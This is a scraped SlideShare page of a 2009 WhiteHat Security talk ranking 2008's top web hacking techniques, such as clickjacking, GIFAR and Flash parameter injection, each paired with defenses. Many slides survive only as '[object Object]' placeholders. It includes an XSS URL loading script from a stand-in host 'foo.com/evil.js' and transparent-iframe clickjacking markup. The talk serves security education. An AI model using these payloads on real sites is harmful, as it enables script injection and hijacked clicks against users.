SlideShare a Scribd company logo
1 of 51
Download to read offline
Top Ten Web Hacking Techniques – 2008 Jeremiah Grossman Founder & Chief Technology Officer WhiteHat Security
Jeremiah Grossman ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],© 2009 WhiteHat, Inc.  |  Page
WhiteHat Security © 2009 WhiteHat, Inc.  |  Page ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object]
© 2009 WhiteHat, Inc.  |  Page MUST  be able to protect against  HOSTILE WEB PAGE MUST  be able to protect against  HOSTILE WEB USER
© 2009 WhiteHat, Inc.  |  Page 2008’s New Web Hacking Techniques 83   (2007) 70 (2008) 65  (2006) http://jeremiahgrossman.blogspot.com/2009/02/top-ten-web-hacking-techniques-of-2008.html
© 2009 WhiteHat, Inc.  |  Page CUPS Detection CSRFing the uTorrent plugin Clickjacking / Videojacking Bypassing URL AuthC and AuthZ with HTTP Verb Tampering I used to know what you watched, on YouTube Safari Carpet Bomb Flash clipboard Hijack Flash Internet Explorer security model bug Frame Injection Fun Free MacWorld Platinum Pass? Yes in 2008!Diminutive Worm, 161 byte Web Worm SNMP XSS Attack Res Timing File Enumeration Without JavaScript in IE7.0Stealing Basic Auth with Persistent XSS Smuggling SMTP through open HTTP proxies Collecting Lots of Free 'Micro-Deposits’ Using your browser URL history to estimate gender Cross-site File Upload Attacks Same Origin Bypassing Using Image Dimensions HTTP Proxies Bypass Firewalls Join a Religion Via CSRF Cross-domain leaks of site logins via Authenticated CSS JavaScript Global Namespace Pollution GIFARHTML/CSS Injections - Primitive Malicious Code Hacking Intranets Through Web Interfaces Cookie Path Traversal Racing to downgrade users to cookie-less authentication MySQL and SQL Column Truncation Vulnerabilities Building Subversive File Sharing With Client Side Applications Firefox XML injection into parse of remote XML Firefox cross-domain information theft (simple text strings, some CSV) Firefox 2 and Web Kit nightly cross-domain image theft Browser's Ghost Busters Exploiting XSS vulnerabilities on cookies Breaking Google Gears' Cross-Origin Communication Model Flash Parameter Injection  Cross Environment Hopping Exploiting Logged Out XSS Vulnerabilities Exploiting CSRF Protected XSSActiveX Repurposing Tunneling tcp over http over sql-injection Arbitrary TCP over uploaded pages Local DoS on CUPS to a remote exploit via specially-crafted webpage JavaScript Code Flow Manipulation Common localhost dns misconfiguration can lead to "same site" scripting Pulling system32 out over blind SQL Injection Dialog Spoofing - Firefox Basic Authentication Skype cross-zone scripting vulnerability Safari pwns Internet Explorer IE "Print Table of Links" Cross-Zone Scripting Vulnerability A different Opera Abusing HTML 5 Structured Client-side Storage SSID Script Injection DHCP Script Injection File Download Injection Navigation Hijacking (Frame/Tab Injection Attacks) UPnP Hacking via Flash Total surveillance made easy with VoIP phone Social Networks Evil Twin Attacks Recursive File Include DoS Multi-pass filters bypass Session Extending Code Execution via XSS Redirector’s hell Persistent SQL Injection JSON Hijacking with UTF-7SQL Smuggling Abusing PHP Sockets CSRF on Novell GroupWise WebAccess
© 2009 WhiteHat, Inc.  |  Page 10 http://blog.watchfire.com/wfblog/2008/10/flash-parameter.html http://blog.watchfire.com/FPI.pdf By: Yuval Baror, Ayal Yogev, and Adi Sharabani  Flash Parameter Injection introduces a new way to inject values to global parameters in Flash movies while the movie is embedded in it's original HTML environment.  These injected parameters can grant the attacker full control over the page DOM, as well as control over other objects within the Flash movie. This can lead to more elaborate attacks that take advantage of the interaction between the Flash movie and the HTML page in which it is embedded. Flash Parameter Injection
How it works ,[object Object],© 2009 WhiteHat, Inc.  |  Page ActionScript 2 code reading a global variable
© 2009 WhiteHat, Inc.  |  Page Passing arguments in an embedded URI  Passing arguments using 'flashvars'  DOM-based Flash parameter injection
© 2009 WhiteHat, Inc.  |  Page Persistent Flash Parameter Injection
Defenses ,[object Object],© 2009 WhiteHat, Inc.  |  Page
© 2009 WhiteHat, Inc.  |  Page 9 http://carnal0wnage.blogspot.com/2008/08/owning-client-without-and-exploit.html http://www.sensepost.com/blog/2237.html http://www.networkworld.com/news/2008/0 80708-black-hat-ssl-vpn-security.html By: Haroon Meer Multi-staged attack to get code execution on victims who were running a vulnerable and popular SSL-VPN ActiveX control. ActiveX Repurposing
How it works © 2009 WhiteHat, Inc.  |  Page
[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],© 2009 WhiteHat, Inc.  |  Page
Defenses ,[object Object],[object Object],[object Object],[object Object],© 2009 WhiteHat, Inc.  |  Page
Tunneling TCP over HTTP over SQL-Injection © 2009 WhiteHat, Inc.  |  Page 8 http://www.sensepost.com/research/reDuh/SensePost_2008.tgz By: Glenn Willinson, Marco Slaviero and Haroon Meer Create a TCP circuit through reDuh over squeeza by building the server component within SQL Servers CLR subsystem.
© 2009 WhiteHat, Inc.  |  Page
© 2009 WhiteHat, Inc.  |  Page
Defenses ,[object Object],© 2009 WhiteHat, Inc.  |  Page
Cross-domain leaks of site logins via Authenticated CSS © 2009 WhiteHat, Inc.  |  Page 7 http://scarybeastsecurity.blogspot.com/2008/08/cross-domain-leaks-of-site-logins.html By: Chris Evans and Michal Zalewski Checks the contents of a style sheet property value across domains. The most reliable technique to determine whether the victim is logged-in to a given website or not.
How it works ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],© 2009 WhiteHat, Inc.  |  Page
Defenses © 2009 WhiteHat, Inc.  |  Page As a Web application, do not store anything sensitive (such as user-identifying customizations) in stylesheet properties. If you must, make sure to store the properties in their own CSS file and ensure the URL of that file unguessable to attackers for a given victim user.
Abusing HTML 5 Structured Client-side Storage © 2009 WhiteHat, Inc.  |  Page 6 http://trivero.secdiscover.com/html5whitepaper.pdf By: Alberto Trivero HTML5 has introduced three new powerful ways to save big amount of data on the client's PC through the browser. Attackers could steal or modify sensitive data online or offline. If a web application which uses this kind of client-side storage is vulnerable to XSS (Cross- site scripting) attacks we can use an attack payload to read or modify the content of known storage keys (session storage, global storage, local storage or database storage) on the computer’s victim. If the web application loads data or code from the local storage, could be also quite powerful to inject malicious code that will be executed every time the web application will request it.
How it works ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],© 2009 WhiteHat, Inc.  |  Page
[object Object],[object Object],[object Object],[object Object],© 2009 WhiteHat, Inc.  |  Page
[object Object],[object Object],[object Object],[object Object],[object Object],© 2009 WhiteHat, Inc.  |  Page
© 2009 WhiteHat, Inc.  |  Page http://example.com/page.php?name= <script src= http://foo.com/evil.js ></script>
Defenses © 2009 WhiteHat, Inc.  |  Page Website : Avoid saving sensitive data on the users machine and clear the client-side storage whenever possible. Web Browser :  Web users should check regularly the content of the HTML5 client-side storage saved by their browser (delete?). LSO Storage Locations : Windows XP $userpplication Dataacromedialash PlayerSharedObjects Windows Vista $userppDataoamingacromedialash PlayerSharedObjects Mac OS X  ~/Library/Preferences/Macromedia/Flash Player/#SharedObjects Linux  /home/$user/.macromedia/Flash_Player/#SharedObjects
A Different Opera © 2009 WhiteHat, Inc.  |  Page 5 http://www.wisec.it/sectou.php?id=49102ef18b7f3 http://aviv.raffon.net/2008/10/30/ADifferentOpe ra.aspx http://seclists.org/fulldisclosure/2008/Oct/04 01.html By: Stefano Di Paola Exploit an XSS in Opera:feature scheme leading to code execution by abusing same origin policy.
How it works ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],© 2009 WhiteHat, Inc.  |  Page
Defenses ,[object Object],© 2009 WhiteHat, Inc.  |  Page
Clickjacking / Videojacking © 2009 WhiteHat, Inc.  |  Page 4 http://www.sectheory.com/clickjacking.htm http://jeremiahgrossman.blogspot.com/2008 /10/clickjacking-web-pages-can-see-and-hear.html http://blogs.adobe.com/psirt/2008/10/cli ckjacking_security_advisory.html By: Jeremiah Grossman and Robert Hansen Think of any button – image, link, form, etc. – on any website – that can appear between the Web browser walls. This includes wire transfer on banks, DSL router buttons, Digg buttons, CPC advertising banners, Netflix queue.  Next consider that an attacker can invisibly hover these buttons below the user's mouse, so that when a user clicks on something they visually see, they're actually clicking on something the attacker wants them to.
© 2009 WhiteHat, Inc.  |  Page
Hover Invisible IFRAMEs © 2009 WhiteHat, Inc.  |  Page <iframe src=&quot; http://victim/page.html &quot; scrolling=&quot;no&quot;frameborder=&quot;0&quot; style=&quot;opacity:.1;filter: alpha(opacity=.1); -moz-opacity:1.0;&quot;> </iframe> HTML, CSS, and JavaScript may size, follow the mouse and make transparent third-party IFRAME content.
© 2009 WhiteHat, Inc.  |  Page HTML, CSS, and JavaScript may size, follow the mouse and make transparent third-party IFRAME content.
What if a Web page could See and Hear you? © 2009 WhiteHat, Inc.  |  Page Clickjacking enables corporate espionage, government surveillance, home user spying, etc. Every computer with a webcam and/or a microphone becomes a remote monitoring device. JavaScript can’t access the webcam or microphone...
© 2009 WhiteHat, Inc.  |  Page <div style=&quot; opacity:.1;filter: alpha(opacity=.1); -moz-opacity:.9 &quot;><embed  src=&quot;vid.swf&quot;  type=&quot;application/x-shockwave-flash&quot;  allowfullscreen=&quot;false&quot;  wmode=&quot;transparent&quot; ></embed></div>
Defenses ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],© 2009 WhiteHat, Inc.  |  Page ,[object Object],[object Object]
Safari Carpet Bomb © 2009 WhiteHat, Inc.  |  Page http://www.dhanjani.com/blog/2008/05/safari-carpet-b.html http://www.oreillynet.com/onlamp/blog/2008/05/safari_carp et_bomb.html http://aviv.raffon.net/2008/05/31/SafariPwnsInternetExpl orer.aspx By: Nitesh Dhanjani The Safari Carpet Bomb attack allows a malicious website controlled by an attacker to litter the user's desktop on windows or the user's “Downloads” directory on OSX with arbitrary files and malware. This vulnerability has the distinction of bringing the term &quot;blended threat&quot; into the security vernacular because, if you are able to litter user's machines with arbitrary files, you can further the impact and affect other applications that trust content on the local filesystem. 3
How it works ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],© 2009 WhiteHat, Inc.  |  Page
© 2009 WhiteHat, Inc.  |  Page
Defenses ,[object Object],[object Object],[object Object],[object Object],© 2009 WhiteHat, Inc.  |  Page
Breaking Google Gears' Cross-Origin Communication Model © 2009 WhiteHat, Inc.  |  Page 2 http://blog.watchfire.com/wfblog/2008/12/breaking-google-gears-cross-origin-communication-model.html By: Yair Amit Under some circumstances the cross-origin communication security model of Google Gears could be bypassed. An attacker could gain access to sensitive resources of the victim in other websites (even those that does not use Google Gears) - mainly ones that contain users' content (forums, web-mails, social networks, office-like services, etc.).
Google Gears Workers ,[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],[object Object],© 2009 WhiteHat, Inc.  |  Page
Attack Flow ,[object Object],[object Object],[object Object],[object Object],[object Object],© 2009 WhiteHat, Inc.  |  Page
Defenses © 2009 WhiteHat, Inc.  |  Page Update Google Gears. (Content-Type header value (application/x-gears-worker) Web developers who rely on Google Gears should be aware that the fix might require some changes, such as creating a special rule in the Web server for serving Google-Gears worker code files.
Top Ten Web Hacking Techniques (008) © 2009 WhiteHat, Inc.  |  Page
GIFAR © 2009 WhiteHat, Inc.  |  Page 1 http://riosec.com/how-to-create-a-gifar http://xs-sniper.com/blog/2008/12/17/su n-fixes-gifars/ http://blogs.zdnet.com/security/?p=161 9 By: Billy Rios, Nathan McFeters, Rob Carter, and John Heasman A content ownership issue taking advantage of flimsy security controls on both the server side and the client side.  What's new is appending a Java Applet (in the form of a JAR) at the end of another file that would be commonly allowed in file uploads on web applications, such as images, word documents, audio/video files, just about anything.  
How it works © 2009 WhiteHat, Inc.  |  Page JAR GIF
Defenses © 2009 WhiteHat, Inc.  |  Page Website:   Do not accept file uploads Host uploaded content on throw away domains or IP addresses Convert all content Web Browser: a) Disable third-party browser extensions b) Install the latest JVM and remove older versions
Thank You Jeremiah Grossman Blog: http://jeremiahgrossman.blogspot.com/ Twitter: http://twitter.com/jeremiahg Email: jeremiah@whitehatsec.com WhiteHat Security http://www.whitehatsec.com/

More Related Content

What's hot

2010: A Web Hacking Odyssey - Top Ten Hacks of the Year
2010: A Web Hacking Odyssey - Top Ten Hacks of the Year2010: A Web Hacking Odyssey - Top Ten Hacks of the Year
2010: A Web Hacking Odyssey - Top Ten Hacks of the YearJeremiah Grossman
 
JSFoo Chennai 2012
JSFoo Chennai 2012JSFoo Chennai 2012
JSFoo Chennai 2012Krishna T
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Jay Nagar
 
Web browser privacy and security
Web browser privacy and security Web browser privacy and security
Web browser privacy and security amiable_indian
 
Secure web messaging in HTML5
Secure web messaging in HTML5Secure web messaging in HTML5
Secure web messaging in HTML5Krishna T
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5Shreeraj Shah
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011Samvel Gevorgyan
 
Html5 security
Html5 securityHtml5 security
Html5 securityKrishna T
 
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYANBEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYANSamvel Gevorgyan
 
Clickjacking DevCon2011
Clickjacking DevCon2011Clickjacking DevCon2011
Clickjacking DevCon2011Krishna T
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserShreeraj Shah
 
Web Security: A Primer for Developers
Web Security: A Primer for DevelopersWeb Security: A Primer for Developers
Web Security: A Primer for DevelopersMike North
 
New Insights into Clickjacking
New Insights into ClickjackingNew Insights into Clickjacking
New Insights into ClickjackingMarco Balduzzi
 
Hacking A Web Site And Secure Web Server Techniques Used
Hacking A Web Site And Secure Web Server Techniques UsedHacking A Web Site And Secure Web Server Techniques Used
Hacking A Web Site And Secure Web Server Techniques UsedSiddharth Bhattacharya
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Shreeraj Shah
 
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Shreeraj Shah
 

What's hot (20)

2010: A Web Hacking Odyssey - Top Ten Hacks of the Year
2010: A Web Hacking Odyssey - Top Ten Hacks of the Year2010: A Web Hacking Odyssey - Top Ten Hacks of the Year
2010: A Web Hacking Odyssey - Top Ten Hacks of the Year
 
JSFoo Chennai 2012
JSFoo Chennai 2012JSFoo Chennai 2012
JSFoo Chennai 2012
 
Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )Website hacking and prevention (All Tools,Topics & Technique )
Website hacking and prevention (All Tools,Topics & Technique )
 
Web browser privacy and security
Web browser privacy and security Web browser privacy and security
Web browser privacy and security
 
Secure web messaging in HTML5
Secure web messaging in HTML5Secure web messaging in HTML5
Secure web messaging in HTML5
 
XSS and CSRF with HTML5
XSS and CSRF with HTML5XSS and CSRF with HTML5
XSS and CSRF with HTML5
 
Starwest 2008
Starwest 2008Starwest 2008
Starwest 2008
 
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
CROSS-SITE REQUEST FORGERY - IN-DEPTH ANALYSIS 2011
 
Html5 security
Html5 securityHtml5 security
Html5 security
 
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYANBEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
BEST PRACTICES OF WEB APPLICATION SECURITY By SAMVEL GEVORGYAN
 
Phishing with Super Bait
Phishing with Super BaitPhishing with Super Bait
Phishing with Super Bait
 
Browser Security
Browser SecurityBrowser Security
Browser Security
 
Clickjacking DevCon2011
Clickjacking DevCon2011Clickjacking DevCon2011
Clickjacking DevCon2011
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
 
Web Security: A Primer for Developers
Web Security: A Primer for DevelopersWeb Security: A Primer for Developers
Web Security: A Primer for Developers
 
New Insights into Clickjacking
New Insights into ClickjackingNew Insights into Clickjacking
New Insights into Clickjacking
 
Hacking A Web Site And Secure Web Server Techniques Used
Hacking A Web Site And Secure Web Server Techniques UsedHacking A Web Site And Secure Web Server Techniques Used
Hacking A Web Site And Secure Web Server Techniques Used
 
4.Xss
4.Xss4.Xss
4.Xss
 
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
Hacking Web 2.0 - Defending Ajax and Web Services [HITB 2007 Dubai]
 
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
Next Generation Web Attacks – HTML 5, DOM(L3) and XHR(L2)
 

Similar to Top Ten Web Hacking Techniques – 2008

Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Matt Johansen
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) securityNahidul Kibria
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developersJohn Ombagi
 
Why You Need A Web Application Firewall
Why You Need A Web Application FirewallWhy You Need A Web Application Firewall
Why You Need A Web Application FirewallPort80 Software
 
Browser Wars 2019 - Implementing a Content Security Policy
Browser Wars 2019 - Implementing a Content Security PolicyBrowser Wars 2019 - Implementing a Content Security Policy
Browser Wars 2019 - Implementing a Content Security PolicyGeorge Boobyer
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application SecurityChris Hillman
 
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Drive By Downloads:  How To Avoid Getting a Cap Popped in Your App Drive By Downloads:  How To Avoid Getting a Cap Popped in Your App
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App Cenzic
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdfssuser01066a
 
Web Application Scanning 101
Web Application Scanning 101Web Application Scanning 101
Web Application Scanning 101Sasha Nunke
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Shreeraj Shah
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Ikhade Maro Igbape
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Divyanshu
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008abhijitapatil
 
Application Security
Application SecurityApplication Security
Application Securitynirola
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 

Similar to Top Ten Web Hacking Techniques – 2008 (20)

Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
 
Top 10 Web Hacks 2012
Top 10 Web Hacks 2012Top 10 Web Hacks 2012
Top 10 Web Hacks 2012
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecurities
 
Penetration testing web application web application (in) security
Penetration testing web application web application (in) securityPenetration testing web application web application (in) security
Penetration testing web application web application (in) security
 
A security note for web developers
A security note for web developersA security note for web developers
A security note for web developers
 
Why You Need A Web Application Firewall
Why You Need A Web Application FirewallWhy You Need A Web Application Firewall
Why You Need A Web Application Firewall
 
Browser Wars 2019 - Implementing a Content Security Policy
Browser Wars 2019 - Implementing a Content Security PolicyBrowser Wars 2019 - Implementing a Content Security Policy
Browser Wars 2019 - Implementing a Content Security Policy
 
Security Tech Talk
Security Tech TalkSecurity Tech Talk
Security Tech Talk
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
Drive By Downloads:  How To Avoid Getting a Cap Popped in Your App Drive By Downloads:  How To Avoid Getting a Cap Popped in Your App
Drive By Downloads: How To Avoid Getting a Cap Popped in Your App
 
XCS110_All_Slides.pdf
XCS110_All_Slides.pdfXCS110_All_Slides.pdf
XCS110_All_Slides.pdf
 
Web Application Security
Web Application SecurityWeb Application Security
Web Application Security
 
Web Application Scanning 101
Web Application Scanning 101Web Application Scanning 101
Web Application Scanning 101
 
Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010Web Attacks - Top threats - 2010
Web Attacks - Top threats - 2010
 
Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation Cross Site Scripting Defense Presentation
Cross Site Scripting Defense Presentation
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
 
Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008Owasp Top 10 - Owasp Pune Chapter - January 2008
Owasp Top 10 - Owasp Pune Chapter - January 2008
 
Application Security
Application SecurityApplication Security
Application Security
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 

More from Jeremiah Grossman

All these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterAll these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterJeremiah Grossman
 
How to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorHow to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorJeremiah Grossman
 
The Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryThe Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryJeremiah Grossman
 
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensExploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensJeremiah Grossman
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareJeremiah Grossman
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareJeremiah Grossman
 
Next Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideNext Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideJeremiah Grossman
 
Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Jeremiah Grossman
 
Ransomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to KnowRansomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to KnowJeremiah Grossman
 
Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Jeremiah Grossman
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage YearsJeremiah Grossman
 
15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage Years15 Years of Web Security: The Rebellious Teenage Years
15 Years of Web Security: The Rebellious Teenage YearsJeremiah Grossman
 
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)
Where Flow Charts Don’t Go -- Website Security Statistics Report (2015)Jeremiah Grossman
 
WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015WhiteHat’s Website Security Statistics Report 2015
WhiteHat’s Website Security Statistics Report 2015Jeremiah Grossman
 
No More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesNo More Snake Oil: Why InfoSec Needs Security Guarantees
No More Snake Oil: Why InfoSec Needs Security GuaranteesJeremiah Grossman
 
WhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedWhiteHat Security 2014 Statistics Report Explained
WhiteHat Security 2014 Statistics Report ExplainedJeremiah Grossman
 
WhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportWhiteHat 2014 Website Security Statistics Report
WhiteHat 2014 Website Security Statistics ReportJeremiah Grossman
 
WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)WhiteHat Security Website Statistics [Full Report] (2013)
WhiteHat Security Website Statistics [Full Report] (2013)Jeremiah Grossman
 
WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]WhiteHat’s 12th Website Security Statistics [Full Report]
WhiteHat’s 12th Website Security Statistics [Full Report]Jeremiah Grossman
 

More from Jeremiah Grossman (20)

All these vulnerabilities, rarely matter
All these vulnerabilities, rarely matterAll these vulnerabilities, rarely matter
All these vulnerabilities, rarely matter
 
How to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare SectorHow to Determine Your Attack Surface in the Healthcare Sector
How to Determine Your Attack Surface in the Healthcare Sector
 
The Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare IndustryThe Attack Surface of the Healthcare Industry
The Attack Surface of the Healthcare Industry
 
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash ScreensExploring the Psychological Mechanisms used in Ransomware Splash Screens
Exploring the Psychological Mechanisms used in Ransomware Splash Screens
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
 
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About RansomwareWhat the Kidnapping & Ransom Economy Teaches Us About Ransomware
What the Kidnapping & Ransom Economy Teaches Us About Ransomware
 
Next Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers GuideNext Generation Endpoint Prtection Buyers Guide
Next Generation Endpoint Prtection Buyers Guide
 
Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?Can Ransomware Ever Be Defeated?
Can Ransomware Ever Be Defeated?
 
Ransomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to KnowRansomware is Here: Fundamentals Everyone Needs to Know
Ransomware is Here: Fundamentals Everyone Needs to Know
 
Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016Web Application Security Statistics Report 2016
Web Application Security Statistics Report 2016
 
15 Years of Web Security: The Rebellious Teenage Years
